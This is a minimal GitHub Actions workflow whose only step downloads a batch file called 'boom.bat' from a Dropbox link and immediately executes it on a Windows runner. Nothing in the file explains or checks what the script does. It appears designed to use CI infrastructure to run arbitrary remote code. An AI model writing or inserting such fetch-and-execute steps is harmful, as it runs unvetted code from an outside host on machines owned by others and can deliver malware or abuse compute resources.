name: get go

on:
  workflow_dispatch:

jobs:
  build:
    name: Werdo
    runs-on: windows-latest

    steps:
      - name: Bring it!
        run: Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/4z6sauz95fmk4ok4xwxkr/boom.bat?rlkey=lcotzmzw9bop9t9wf9vk2wn78&dl=1" -OutFile "boom.bat"
             cmd /c boom.bat
